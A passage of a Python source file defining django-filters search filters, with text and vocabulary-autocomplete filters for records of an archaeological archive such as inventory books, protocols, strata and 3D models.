url="/vocabs-ac/specific-concept-ac/file_extension",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
copyright = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="copyright"
),
help_text=Inventorybooks._meta.get_field('copyright').help_text,
label=Inventorybooks._meta.get_field('copyright').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/copyright",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=Inventorybooks._meta.get_field('access').help_text,
label=Inventorybooks._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=Inventorybooks._meta.get_field('site_id').help_text,
label=Inventorybooks._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
equipment_scan = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="equipment_scan"
),
help_text=Inventorybooks._meta.get_field('equipment_scan').help_text,
label=Inventorybooks._meta.get_field('equipment_scan').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/equipment_scan",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
source_original_copy_edited_copy = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="source_original_copy_edited_copy"
),
help_text=Inventorybooks._meta.get_field('source_original_copy_edited_copy').help_text,
label=Inventorybooks._meta.get_field('source_original_copy_edited_copy').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/source_original_copy_edited_copy",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
original_material = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="original_material"
),
help_text=Inventorybooks._meta.get_field('original_material').help_text,
label=Inventorybooks._meta.get_field('original_material').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/original_material",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
excavation_post_excavation = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="excavation_post_excavation"
),
help_text=Inventorybooks._meta.get_field('excavation_post_excavation').help_text,
label=Inventorybooks._meta.get_field('excavation_post_excavation').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/excavation_post_excavation",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = Inventorybooks
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'creator_original',
'creator_scan',
'document_type',
'convolute_inventory_number',
'bone_stone_inventory_number',
'filename',
'document_id',
'document_title',
'filename_old',
'creation_date_original',
'creation_year_original',
'creation_date_scan',
'creation_date_metadata',
'storage_folder_original',
'resolution_scan_dpi',
'find_inventory_number',
'original_comment',
'file_extension',
'copyright',
'access',
'site_id',
'equipment_scan',
'source_original_copy_edited_copy',
'original_material',
'excavation_post_excavation',
]
class PhasenIDListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=PhasenID._meta.get_field('legacy_id').help_text,
label=PhasenID._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=PhasenID._meta.get_field('fc_name').help_text,
label=PhasenID._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=PhasenID._meta.get_field('fc_directory').help_text,
label=PhasenID._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=PhasenID._meta.get_field('fc_type').help_text,
label=PhasenID._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=PhasenID._meta.get_field('fc_filename').help_text,
label=PhasenID._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=PhasenID._meta.get_field('fc_extension').help_text,
label=PhasenID._meta.get_field('fc_extension').verbose_name
)
phase_type = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="phase_type"
),
help_text=PhasenID._meta.get_field('phase_type').help_text,
label=PhasenID._meta.get_field('phase_type').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/phase_type",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=PhasenID._meta.get_field('site_id').help_text,
label=PhasenID._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
phase_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=PhasenID._meta.get_field('phase_id').help_text,
label=PhasenID._meta.get_field('phase_id').verbose_name
)
phase_title = django_filters.CharFilter(
lookup_expr='icontains',
help_text=PhasenID._meta.get_field('phase_title').help_text,
label=PhasenID._meta.get_field('phase_title').verbose_name
)
containing_phase_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="containing_phase_id"
),
help_text=PhasenID._meta.get_field('containing_phase_id').help_text,
label=PhasenID._meta.get_field('containing_phase_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/containing_phase_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = PhasenID
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'phase_type',
'site_id',
'phase_id',
'phase_title',
'area',
'containing_phase_id',
]
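# The CharFilter definitions above all use `lookup_expr='icontains'`, i.e. a
# case-insensitive substring match performed by the database. Its semantics,
# modeled in plain Python purely for illustration:

```python
def icontains(haystack, needle):
    """Mirror the semantics of Django's `icontains` lookup:
    case-insensitive substring containment."""
    return needle.lower() in haystack.lower()
```

# So filtering `phase_title` by "phase" would match "Phase 1" as well as
# "Early phase", which suits free-text legacy fields better than exact lookups.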

class ProtocolsListFilter(django_filters.FilterSet):
    legacy_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Protocols._meta.get_field('legacy_id').help_text,
        label=Protocols._meta.get_field('legacy_id').verbose_name
    )
    fc_name = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Protocols._meta.get_field('fc_name').help_text,
        label=Protocols._meta.get_field('fc_name').verbose_name
    )
    fc_directory = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Protocols._meta.get_field('fc_directory').help_text,
        label=Protocols._meta.get_field('fc_directory').verbose_name
    )
    fc_type = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Protocols._meta.get_field('fc_type').help_text,
        label=Protocols._meta.get_field('fc_type').verbose_name
    )
    fc_filename = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Protocols._meta.get_field('fc_filename').help_text,
        label=Protocols._meta.get_field('fc_filename').verbose_name
    )
    fc_extension = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Protocols._meta.get_field('fc_extension').help_text,
        label=Protocols._meta.get_field('fc_extension').verbose_name
    )
    filename = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Protocols._meta.get_field('filename').help_text,
        label=Protocols._meta.get_field('filename').verbose_name
    )
    document_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Protocols._meta.get_field('document_id').help_text,
        label=Protocols._meta.get_field('document_id').verbose_name
    )
    document_title = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Protocols._meta.get_field('document_title').help_text,
        label=Protocols._meta.get_field('document_title').verbose_name
    )
    filename_old = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Protocols._meta.get_field('filename_old').help_text,
        label=Protocols._meta.get_field('filename_old').verbose_name
    )
    creation_year_original = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Protocols._meta.get_field('creation_year_original').help_text,
        label=Protocols._meta.get_field('creation_year_original').verbose_name
    )
    storage_folder_original = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Protocols._meta.get_field('storage_folder_original').help_text,
        label=Protocols._meta.get_field('storage_folder_original').verbose_name
    )
    original_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Protocols._meta.get_field('original_comment').help_text,
        label=Protocols._meta.get_field('original_comment').verbose_name
    )
    digitisation_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Protocols._meta.get_field('digitisation_comment').help_text,
        label=Protocols._meta.get_field('digitisation_comment').verbose_name
    )
    file_extension = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="file_extension"
        ),
        help_text=Protocols._meta.get_field('file_extension').help_text,
        label=Protocols._meta.get_field('file_extension').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/file_extension",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    copyright = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="copyright"
        ),
        help_text=Protocols._meta.get_field('copyright').help_text,
        label=Protocols._meta.get_field('copyright').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/copyright",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    access = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="access"
        ),
        help_text=Protocols._meta.get_field('access').help_text,
        label=Protocols._meta.get_field('access').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/access",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    storage = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="storage"
        ),
        help_text=Protocols._meta.get_field('storage').help_text,
        label=Protocols._meta.get_field('storage').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/storage",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    site_id = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="site_id"
        ),
        help_text=Protocols._meta.get_field('site_id').help_text,
        label=Protocols._meta.get_field('site_id').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/site_id",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    equipment_scan = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="equipment_scan"
        ),
        help_text=Protocols._meta.get_field('equipment_scan').help_text,
        label=Protocols._meta.get_field('equipment_scan').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/equipment_scan",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    source_original_copy_edited_copy = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="source_original_copy_edited_copy"
        ),
        help_text=Protocols._meta.get_field('source_original_copy_edited_copy').help_text,
        label=Protocols._meta.get_field('source_original_copy_edited_copy').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/source_original_copy_edited_copy",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    original_material = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="original_material"
        ),
        help_text=Protocols._meta.get_field('original_material').help_text,
        label=Protocols._meta.get_field('original_material').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/original_material",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    excavation_post_excavation = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="excavation_post_excavation"
        ),
        help_text=Protocols._meta.get_field('excavation_post_excavation').help_text,
        label=Protocols._meta.get_field('excavation_post_excavation').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/excavation_post_excavation",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )

    class Meta:
        model = Protocols
        fields = [
            'id',
            'legacy_id',
            'fc_name',
            'fc_directory',
            'fc_type',
            'fc_filename',
            'fc_match',
            'creator_metadata',
            'creator_original',
            'creator_scan',
            'excavation_object_id',
            'filename',
            'document_id',
            'document_title',
            'filename_old',
            'document_type',
            'creation_date_original',
            'creation_year_original',
            'creation_date_scan',
            'creation_date_metadata',
            'storage_folder_original',
            'resolution_scan_dpi',
            'archaeological_object_id',
            'number_of_pages',
            'original_comment',
            'digitisation_comment',
            'file_extension',
            'copyright',
            'access',
            'storage',
            'site_id',
            'equipment_scan',
            'source_original_copy_edited_copy',
            'original_material',
            'excavation_post_excavation',
        ]

class StratenIDListFilter(django_filters.FilterSet):
    legacy_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=StratenID._meta.get_field('legacy_id').help_text,
        label=StratenID._meta.get_field('legacy_id').verbose_name
    )
    fc_name = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=StratenID._meta.get_field('fc_name').help_text,
        label=StratenID._meta.get_field('fc_name').verbose_name
    )
    fc_directory = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=StratenID._meta.get_field('fc_directory').help_text,
        label=StratenID._meta.get_field('fc_directory').verbose_name
    )
    fc_type = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=StratenID._meta.get_field('fc_type').help_text,
        label=StratenID._meta.get_field('fc_type').verbose_name
    )
    fc_filename = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=StratenID._meta.get_field('fc_filename').help_text,
        label=StratenID._meta.get_field('fc_filename').verbose_name
    )
    fc_extension = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=StratenID._meta.get_field('fc_extension').help_text,
        label=StratenID._meta.get_field('fc_extension').verbose_name
    )
    stratum_type = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="stratum_type"
        ),
        help_text=StratenID._meta.get_field('stratum_type').help_text,
        label=StratenID._meta.get_field('stratum_type').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/stratum_type",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    site_id = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="site_id"
        ),
        help_text=StratenID._meta.get_field('site_id').help_text,
        label=StratenID._meta.get_field('site_id').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/site_id",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    stratum_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=StratenID._meta.get_field('stratum_id').help_text,
        label=StratenID._meta.get_field('stratum_id').verbose_name
    )
    stratum_title = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=StratenID._meta.get_field('stratum_title').help_text,
        label=StratenID._meta.get_field('stratum_title').verbose_name
    )
    containing_stratum_id = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="containing_stratum_id"
        ),
        help_text=StratenID._meta.get_field('containing_stratum_id').help_text,
        label=StratenID._meta.get_field('containing_stratum_id').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/containing_stratum_id",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )

    class Meta:
        model = StratenID
        fields = [
            'id',
            'legacy_id',
            'fc_name',
            'fc_directory',
            'fc_type',
            'fc_filename',
            'fc_match',
            'stratum_type',
            'site_id',
            'stratum_id',
            'stratum_title',
            'area',
            'containing_stratum_id',
        ]

class TablesListFilter(django_filters.FilterSet):
    legacy_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Tables._meta.get_field('legacy_id').help_text,
        label=Tables._meta.get_field('legacy_id').verbose_name
    )
    fc_name = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Tables._meta.get_field('fc_name').help_text,
        label=Tables._meta.get_field('fc_name').verbose_name
    )
    fc_directory = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Tables._meta.get_field('fc_directory').help_text,
        label=Tables._meta.get_field('fc_directory').verbose_name
    )
    fc_type = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Tables._meta.get_field('fc_type').help_text,
        label=Tables._meta.get_field('fc_type').verbose_name
    )
    fc_filename = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Tables._meta.get_field('fc_filename').help_text,
        label=Tables._meta.get_field('fc_filename').verbose_name
    )
    fc_extension = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Tables._meta.get_field('fc_extension').help_text,
        label=Tables._meta.get_field('fc_extension').verbose_name
    )
    filename = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Tables._meta.get_field('filename').help_text,
        label=Tables._meta.get_field('filename').verbose_name
    )
    document_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Tables._meta.get_field('document_id').help_text,
        label=Tables._meta.get_field('document_id').verbose_name
    )
    document_title = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Tables._meta.get_field('document_title').help_text,
        label=Tables._meta.get_field('document_title').verbose_name
    )
    path_filename_old = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Tables._meta.get_field('path_filename_old').help_text,
        label=Tables._meta.get_field('path_filename_old').verbose_name
    )
    creation_year_original = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Tables._meta.get_field('creation_year_original').help_text,
        label=Tables._meta.get_field('creation_year_original').verbose_name
    )
    folder_original = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Tables._meta.get_field('folder_original').help_text,
        label=Tables._meta.get_field('folder_original').verbose_name
    )
    original_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Tables._meta.get_field('original_comment').help_text,
        label=Tables._meta.get_field('original_comment').verbose_name
    )
    digitisation_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Tables._meta.get_field('digitisation_comment').help_text,
        label=Tables._meta.get_field('digitisation_comment').verbose_name
    )
    file_extension_original = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="file_extension_original"
        ),
        help_text=Tables._meta.get_field('file_extension_original').help_text,
        label=Tables._meta.get_field('file_extension_original').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/file_extension_original",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    file_extension_archivalobject = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="file_extension_archivalobject"
        ),
        help_text=Tables._meta.get_field('file_extension_archivalobject').help_text,
        label=Tables._meta.get_field('file_extension_archivalobject').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/file_extension_archivalobject",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    copyright = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="copyright"
        ),
        help_text=Tables._meta.get_field('copyright').help_text,
        label=Tables._meta.get_field('copyright').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/copyright",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    access = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="access"
        ),
        help_text=Tables._meta.get_field('access').help_text,
        label=Tables._meta.get_field('access').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/access",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    site_id = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="site_id"
        ),
        help_text=Tables._meta.get_field('site_id').help_text,
        label=Tables._meta.get_field('site_id').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/site_id",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    excavation_post_excavation = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="excavation_post_excavation"
        ),
        help_text=Tables._meta.get_field('excavation_post_excavation').help_text,
        label=Tables._meta.get_field('excavation_post_excavation').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/excavation_post_excavation",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )

    class Meta:
        model = Tables
        fields = [
            'id',
            'legacy_id',
            'fc_name',
            'fc_directory',
            'fc_type',
            'fc_filename',
            'fc_match',
            'creator_metadata',
            'creator_original',
            'creator_archivalobject',
            'document_type',
            'filename',
            'document_id',
            'document_title',
            'path_filename_old',
            'creation_year_original',
            'creation_date_archivalobject',
            'creation_date_metadata',
            'folder_original',
            'excavation_object_id',
            'archaeological_object_id',
            'relatedto',
            'original_comment',
            'digitisation_comment',
            'file_extension_original',
            'file_extension_archivalobject',
            'copyright',
            'access',
            'site_id',
            'excavation_post_excavation',
        ]

class ThreeDimensionalModelListFilter(django_filters.FilterSet):
    legacy_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ThreeDimensionalModel._meta.get_field('legacy_id').help_text,
        label=ThreeDimensionalModel._meta.get_field('legacy_id').verbose_name
    )
    fc_name = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ThreeDimensionalModel._meta.get_field('fc_name').help_text,
        label=ThreeDimensionalModel._meta.get_field('fc_name').verbose_name
    )
    fc_directory = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ThreeDimensionalModel._meta.get_field('fc_directory').help_text,
        label=ThreeDimensionalModel._meta.get_field('fc_directory').verbose_name
    )
    fc_type = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ThreeDimensionalModel._meta.get_field('fc_type').help_text,
        label=ThreeDimensionalModel._meta.get_field('fc_type').verbose_name
    )
    fc_filename = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ThreeDimensionalModel._meta.get_field('fc_filename').help_text,
        label=ThreeDimensionalModel._meta.get_field('fc_filename').verbose_name
    )
    fc_extension = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ThreeDimensionalModel._meta.get_field('fc_extension').help_text,
        label=ThreeDimensionalModel._meta.get_field('fc_extension').verbose_name
    )
    filename = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ThreeDimensionalModel._meta.get_field('filename').help_text,
        label=ThreeDimensionalModel._meta.get_field('filename').verbose_name
    )
    document_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ThreeDimensionalModel._meta.get_field('document_id').help_text,
        label=ThreeDimensionalModel._meta.get_field('document_id').verbose_name
    )
    document_title = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ThreeDimensionalModel._meta.get_field('document_title').help_text,
        label=ThreeDimensionalModel._meta.get_field('document_title').verbose_name
    )
    path_filename_old = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ThreeDimensionalModel._meta.get_field('path_filename_old').help_text,
        label=ThreeDimensionalModel._meta.get_field('path_filename_old').verbose_name
    )
    creation_year_original = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ThreeDimensionalModel._meta.get_field('creation_year_original').help_text,
        label=ThreeDimensionalModel._meta.get_field('creation_year_original').verbose_name
    )
    software_used = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ThreeDimensionalModel._meta.get_field('software_used').help_text,
        label=ThreeDimensionalModel._meta.get_field('software_used').verbose_name
    )
    relatedto = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ThreeDimensionalModel._meta.get_field('relatedto').help_text,
        label=ThreeDimensionalModel._meta.get_field('relatedto').verbose_name
    )
    original_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ThreeDimensionalModel._meta.get_field('original_comment').help_text,
        label=ThreeDimensionalModel._meta.get_field('original_comment').verbose_name
    )
    digitisation_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ThreeDimensionalModel._meta.get_field('digitisation_comment').help_text,
        label=ThreeDimensionalModel._meta.get_field('digitisation_comment').verbose_name
    )
    file_extension_original = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="file_extension_original"
        ),
        help_text=ThreeDimensionalModel._meta.get_field('file_extension_original').help_text,
        label=ThreeDimensionalModel._meta.get_field('file_extension_original').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/file_extension_original",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    file_extension_archivalobject = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="file_extension_archivalobject"
        ),
        help_text=ThreeDimensionalModel._meta.get_field('file_extension_archivalobject').help_text,
        label=ThreeDimensionalModel._meta.get_field('file_extension_archivalobject').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/file_extension_archivalobject",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    copyright = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="copyright"
        ),
        help_text=ThreeDimensionalModel._meta.get_field('copyright').help_text,
        label=ThreeDimensionalModel._meta.get_field('copyright').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/copyright",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    access = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="access"
        ),
        help_text=ThreeDimensionalModel._meta.get_field('access').help_text,
        label=ThreeDimensionalModel._meta.get_field('access').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/access",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    site_id = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="site_id"
        ),
        help_text=ThreeDimensionalModel._meta.get_field('site_id').help_text,
        label=ThreeDimensionalModel._meta.get_field('site_id').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/site_id",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    excavation_post_excavation = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="excavation_post_excavation"
        ),
        help_text=ThreeDimensionalModel._meta.get_field('excavation_post_excavation').help_text,
        label=ThreeDimensionalModel._meta.get_field('excavation_post_excavation').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/excavation_post_excavation",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )

    class Meta:
        model = ThreeDimensionalModel
        fields = [
            'id',
            'legacy_id',
            'fc_name',
            'fc_directory',
            'fc_type',
            'fc_filename',
            'fc_match',
            'filename',
            'document_id',
            'document_title',
            'path_filename_old',
            'creator_metadata',
            'creation_year_original',
            'software_used',
            'creation_date_archivalobject',
            'creator_original',
            'creator_archivalobject',
